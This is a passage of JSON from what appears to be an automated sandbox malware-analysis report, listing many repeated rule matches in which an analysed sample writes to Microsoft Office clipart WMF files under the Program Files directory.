"ref_id": "gfn_37776", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0233512.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0233665.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0233665.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37783", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0233665.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0233992.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0233992.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37790", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0233992.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0234000.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0234000.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37801", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0234000.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0234001.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0234001.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37814", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0234001.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0234376.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0234376.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37823", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0234376.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0237225.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0237225.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37834", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0237225.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0237228.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0237228.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37847", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0237228.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0237336.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0237336.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37856", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0237336.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0237759.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0237759.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37865", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0237759.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0238333.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0238333.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37874", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0238333.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0238927.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0238927.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37883", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0238927.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0238959.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0238959.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37890", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0238959.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0238983.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0238983.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37897", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0238983.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239057.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239057.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37904", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239057.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239063.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239063.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37911", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239063.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239079.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239079.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37918", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239079.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239191.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239191.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37925", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239191.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239611.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239611.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37932", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239611.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239935.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239935.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37943", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239935.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239941.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239941.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37950", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239941.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239943.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239943.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37957", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239943.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239951.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239951.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37964", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239951.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239953.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239953.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37971", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239953.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239955.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239955.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37978", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239955.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239965.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239965.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37985", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239965.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239967.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239967.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37992", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239967.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239973.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239973.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37999", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239973.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239975.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239975.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38006", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239975.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239997.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239997.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38013", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239997.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0240157.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0240157.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38020", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0240157.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0240175.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0240175.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38027", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0240175.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0240189.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0240189.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38038", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0240189.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0240291.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft 